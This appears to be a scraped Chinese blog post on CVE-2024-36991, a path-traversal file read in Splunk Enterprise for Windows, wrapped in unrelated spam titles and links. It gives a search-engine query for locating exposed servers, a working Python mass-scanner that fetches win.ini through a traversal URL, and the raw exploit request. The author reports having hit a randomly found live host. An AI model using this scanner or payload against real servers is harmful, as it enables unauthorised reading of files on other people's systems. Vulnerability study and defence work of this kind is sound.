当前位置: 首页 > news >正文

在哪个网站上找超市做生鲜网站托管如何收费

在哪个网站上找超市做生鲜,网站托管如何收费,网站备案 管局审核 需要多长时间,网页设计电子版教材声明:本文档或演示材料仅用于教育和教学目的。如果任何个人或组织利用本文档中的信息进行非法活动,将与本文档的作者或发布者无关。 一、漏洞描述 Splunk Enterprise 是一款强大的机器数据管理和分析平台,广泛应用于企业中,用于实…

  声明:本文档或演示材料仅用于教育和教学目的。如果任何个人或组织利用本文档中的信息进行非法活动,将与本文档的作者或发布者无关。

一、漏洞描述

Splunk Enterprise 是一款强大的机器数据管理和分析平台,广泛应用于企业中,用于实时收集、索引、搜索、分析和可视化来自各种数据源的日志和数据。Splunk Enterprise for Windows 存在任意文件读取漏洞 (CVE-2024-36991) ,允许未经身份认证的攻击者通过构造特定的请求来读取系统上的任何文件,可能导致重要信息的泄露。

受影响的版本包括:

  • 9.2.0 至 9.2.1(不包括9.2.2)
  • 9.1.0 至 9.1.4(不包括9.1.5)
  • 9.0.0 至 9.0.9(不包括9.0.10)

二、资产收集

1.使用网络空间测绘引擎搜索

鹰图检索:app.name="Splunkd"

2.使用poc批量扫描

import requests  # 导入requests库,用于发送HTTP请求
import argparse  # 导入argparse库,用于处理命令行参数
from urllib3.exceptions import InsecureRequestWarning  # 导入InsecureRequestWarning异常类RED = '\033[91m'  # 定义红色字体的ANSI转义码
RESET = '\033[0m'  # 定义重置字体颜色的ANSI转义码
# 忽略证书验证警告
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)def check_file_read(url):headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15'}file_read_url = f"{url.rstrip('/')}/en-US/modules/messaging/C:%2e%2e/C:%2e%2e/C:%2e%2e/C:%2e%2e/C:%2e%2e/C:%2e%2e/C:%2e%2e/C:%2e%2e/C:%2e%2e/C:%2e%2e/windows/win.ini"try:response = requests.get(file_read_url, headers=headers, verify=False, timeout=30)  # 发送GET请求,不验证SSL证书,设置超时时间为30秒if response.status_code == 200 and "fonts" in response.text:  # 检查响应状态码和响应内容,判断是否存在漏洞print(f"{RED}URL [{url}] 存在Splunk Enterprise for Windows 任意文件读取漏洞{RESET}")else:print(f"URL [{url}] 可能不存在漏洞")except requests.RequestException as e:  # 捕获请求异常print(f"URL [{url}] 请求失败: {e}")def main():parser = argparse.ArgumentParser(description='检测目标地址是否存在Splunk Enterprise for Windows 任意文件读取漏洞')  # 创建命令行参数解析器parser.add_argument('-u', '--url', help='指定目标地址')  # 添加命令行参数:指定目标地址parser.add_argument('-f', '--file', help='指定包含目标地址的文本文件')  # 添加命令行参数:指定包含目标地址的文本文件args = parser.parse_args()  # 解析命令行参数if args.url:  # 如果提供了单个URLif not args.url.startswith("http://") and not args.url.startswith("https://"):  # 确保URL以http://或https://开头args.url = "http://" + args.urlcheck_file_read(args.url)  # 调用check_file_read函数检测漏洞elif args.file:  # 如果提供了包含多个URL的文件with open(args.file, 'r') as file:  # 打开文件并读取内容urls = file.read().splitlines()  # 按行分割文件内容,得到URL列表for url in urls:  # 遍历URL列表if not url.startswith("http://") and not url.startswith("https://"):  # 确保URL以http://或https://开头url = "http://" + urlcheck_file_read(url)  # 调用check_file_read函数检测漏洞if __name__ == '__main__':main()  # 执行主函数

cmd运行:python poc.py -f url.txt

 随机寻找的幸运儿

三、漏洞复现 

1.构造数据包

GET /en-US/modules/messaging/C:../C:../C:../C:../C:../C:../C:../C:../C:../C:../windows/win.ini HTTP/1.1
Host: ip
User-Agent: Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Connection: close
Accept-Encoding: gzip

2.数据包分析 

  1. GET /en-US/modules/messaging/C:../C:../C:../C:../C:../C:../C:../C:../C:../C:../windows/win.ini HTTP/1.1:这是请求行,表示客户端希望从服务器获取的资源路径。在这请求的资源是位于服务器上的文件win.ini,该文件位于多个C:..目录之后。

  2. Host: ip:这是请求头的一部分,指定了请求的目标服务器的IP地址或域名。在这个例子中,目标服务器的IP地址或域名是ip

  3. User-Agent: Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36:这是请求头的一部分,描述了发起请求的客户端的类型和版本信息。

  4. Connection: close:这是请求头的一部分,指示服务器在响应完成后关闭连接。这意味着客户端在接收到响应后不会保持连接,而是立即关闭连接。

  5. Accept-Encoding: gzip:这是请求头的一部分,告诉服务器客户端可以接受gzip压缩的内容。如果服务器支持gzip压缩,它将使用gzip压缩响应内容以减少传输的数据量。

3.结束跑路

使用yakit Web Fuzzer构造数据包发送

每篇一言:现实与理想相差了十万八千里,我马不停蹄,却也鞭长莫及。

http://www.yayakq.cn/news/971922/

相关文章:

  • 苏州自助建站山东菏泽建设银行网站
  • 建设银行企业网站无法打印回单网页特效代码下载
  • 多站点网站群的建设与管理系统兰州城建设计院网站
  • 网站么做淘宝客赚佣金查询网站备案密码是什么样的
  • 那个餐饮网站IP不能安装wordpress
  • 北京网站设计公司飞沐上海网站开发工程师招聘网
  • 长春建站价格wordpress制作友情链接页面
  • 龙华网站建设方案咨询徐州 网站制作
  • 平顶山有做网站的公司陕西省西安市网站建设公司
  • 商会建设网站说明做淘宝图标网站
  • 廊坊网站app开发多少钱一个
  • 网站维护建设费入什么科目网页类型分类7种
  • 宁波网站建设zj95网站建设需要的服务器
  • 织梦的手机端网站中国建站平台
  • 做公益网站怎么赚钱泰安招聘信息最新招聘2022
  • 乡土文化网站怎么做如何在网站后台删除栏目
  • 做爰全过程免费的视频网站开封市网站开发公司
  • 做网站的上海市哪家技术好怎么在58上做公司网站
  • 舟山市建设局网站首页设计公司
  • 报名网站建设公司哪里有自助建站系统免授权版
  • 免费微网站建站系统百度推广外包哪家不错
  • 文字字体是什么网站宁波市网站建设制作费用
  • 连江福州网站建设河南省建设网站首页
  • 自己做网站怎么赢利做字的网站
  • 关于建设门户网站的请示从江网站建设
  • cargo创建个人网站wordpress 文章待审核
  • 网站建设企业有哪些内容海南三亚注册公司需要什么条件
  • php做电商网站有那几个模块权威做网站的公司
  • 网站开发团队需要哪些网页版qq邮箱怎么登录
  • 用自己电脑建网站用户服务管理系统